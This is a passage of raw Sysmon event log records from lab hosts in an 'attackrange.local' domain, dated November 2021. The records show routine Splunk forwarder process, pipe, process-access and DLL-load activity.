Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.789{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:09.789{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.789{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:09.789{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.789{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:09.789{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057345463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.751{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.751{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=352A65930FF5EE134CC5568C11ABF043,SHA256=FB68DDAFA39D6B5901E6CE53245026E1E2FFAA6A1DA61A88C3451AA1785F3B1Ffalsetrue 11241100x800000000000000057345461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.651{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.651{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E02DE079D0F6E0BE075C846FB5583F,SHA256=9A501DAAAC0CED2ECCC0D59FCF8ABE56242DF550544E738AE32E94DD66BF1222falsetrue 10341000x800000000000000021219598Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B45-618E-0BCE-08000000F101}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219597Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219596Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219595Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219594Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5B45-618E-0BCE-08000000F101}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219593Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219592Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.681{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B45-618E-0BCE-08000000F101}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219591Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.666{AD5E2759-5B45-618E-0BCE-08000000F101}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219590Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.290{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73C28AE6A20DDBC63E2855820BDCA4D5,SHA256=77A6666364560040C7220361462B8D0A6B2C7CF56CA99AAB8EEF66C9C1C77396,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219589Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B44-618E-0ACE-08000000F101}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219588Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219587Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219586Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219585Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219584Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-5432-6143-0500-00000000F101}412980C:\Windows\system32\csrss.exe{AD5E2759-5B44-618E-0ACE-08000000F101}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219583Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.994{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B44-618E-0ACE-08000000F101}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219582Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.979{AD5E2759-5B44-618E-0ACE-08000000F101}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057345459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.420{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057345458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.420{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057345457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.420{8B6011A9-5B45-618E-41F3-04000000F101}73483376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.420{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.420{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057345454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.236{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.236{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E0A1FF007B9B691163190DA1433B1B,SHA256=0A2F102A1A30926D4EAA4D0CB9EB7A92B2143BE2BD1EB62F4675F2162B47A795falsetrue 734700x800000000000000057345452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057345448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057345446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program 